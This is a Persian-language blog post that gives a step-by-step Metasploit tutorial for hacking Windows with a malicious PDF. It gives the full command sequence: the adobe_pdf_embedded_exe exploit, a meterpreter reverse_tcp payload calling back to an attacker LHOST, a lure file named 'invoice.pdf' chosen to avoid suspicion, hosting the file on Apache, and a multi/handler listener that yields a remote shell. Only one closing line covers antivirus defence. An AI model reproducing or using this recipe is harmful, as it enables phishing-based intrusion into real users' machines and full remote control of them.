My way is the highway
هک شدن ویندوز با یک فایل PDF
راه های مختلفی برای Exploit کردن ویندوز و دسترسی کامل به آن وجود دارد. امروز با استفاده از یه فایل pdf که شامل یک ویروس است این کار را انجام میدهیم.
برای انجام این کار شما میتونید از کالی لینوکس استفاده کنید یا روی یک ماشین مجازی لینوکس (ترجیحا ابونتو) آن را نصب کنید.
بعد از ورود به کالی دستور زیر اجرا کنید
sudo msfconsole
سپس به دنبال exploit های pdf میگردیم .این دستور تمام exploit های موجود با استفاده از ضعف های امنیتی Adobe را نمایش میدهد.
search type:exploit platform:windows adobe pdf
در اینجا exploit های زیادی مربوط به ویندوز را میبینیم ما دنبال مناسب ترین برای این مقاله هستیم.
که از adobe_pdf_embedded_exe استفاده میکنیم و به شکل زیر آن را فراخوانی میکنیم.
use exploit/windows/fileformat/adobe_pdf_embedded_exe
بعد از انجام تنظیمات باید payload به صورت embed شده توی فایل pdf قرار بدیم .
set payload windows/meterpreter/reverse_tcp
همان گونه که در اسکرین شات بالا میبینید فقط نیاز داریم آدرس LHOST اضافه کنیم که در اصطلاح attacking machine ما هست ، معمولا از سرور مجازی برای target واقعی استفاده میکنند. حال باید فایل embed در pdf بسازیم.
set LHOST 192.168.1.90
خب ، برای انتخاب نام فایل هم باید نامی انتخاب کنید که برای کاربر شک برانگیز نباشد.
set FILENAME invoice.pdf
در مرحله بعدی دستور exploit تایپ میکنیم و فایل pdf ما ساخته میشه.
exploit
همان طور که میبینید فایل ساخته شد و در مسیر مشخص شده در تصور میبینید ذخیره شده است .در مرحله بعد باید فایل pdf به آدرس وب سرور منتقل کنیم. با دستور زیر وب سرور روی ماشین کالی خود اجرا کنید
sudo service apache2 start
سپس فایل را به root document وب سرور جابجا میکنیم.
mv /root/.msf4/local/payroll.pdf /var/www/html
حال ما نیاز داریم ماشین مجازی روی یک پورت خاص تنظیم کنیم .
use exploit/multi/handler
و سپس همان payload که برای فایل pdf انتخاب کردیم.
set payload windows/meterpreter/reverse_tcp
دوباره Ip ماشین مجازی که بالا وارد کردید را تعریف کنید.
set LHOST 192.168.1.90
همون طوری که در تصویر مشاهده میکنید پورت 4444 است . فقط کافی است آن را اجرا کنیم.
run
دقت کنید برای درک بهتر این سناریو بسیار ساده سازی شده است . هکر ها معمولا این فایل ها را به صورت ایمیل ، پیشنهاد های جذاب یا در قالب نام یک کتاب مشهور برای قربانیان ارسال میکنند.
وارد ماشین ویندوز خود شوید ادرس زیر تایپ کنید.
http://192.168.1.90/invoice.pdf
بعد از دانلود و باز کردن فایل روی ویندوز به metasploit بر میگردیم و میبینیم که یک session باز داریم.
تمام! حالا یک دسترسی کامل از ماشین ویندوز داریم فقط کافیست دستور shell بنویسید تا به فایل سیستم دسترسی پیدا کنید .
از اینجا هم میتونید backdoor های مختلفی به وجود بیارید .
چگونه از خود محافظت کنیم؟
با استفاده از آنتی ویرویس های معتبر میتوانید به راحتی فایل های آلوده را تشخیص دهید . نمونه مشابه تشخیص داده شده در آنتی ویروس Kaspersky.
اگر این مقاله برای شما مفید بوده حتما لایک کنید و نظرتون رو بنویسید . برای دیدن مقاله های بیشتر هم من در ویرگول دنبال کنید.
مطلبی دیگر از این انتشارات
تفکر کوانتومی
مطلبی دیگر از این انتشارات
تحلیل و بررسی فیلم درخشش ابدی یک ذهن پاک
مطلبی دیگر از این انتشارات
برنامه حسابداری ساده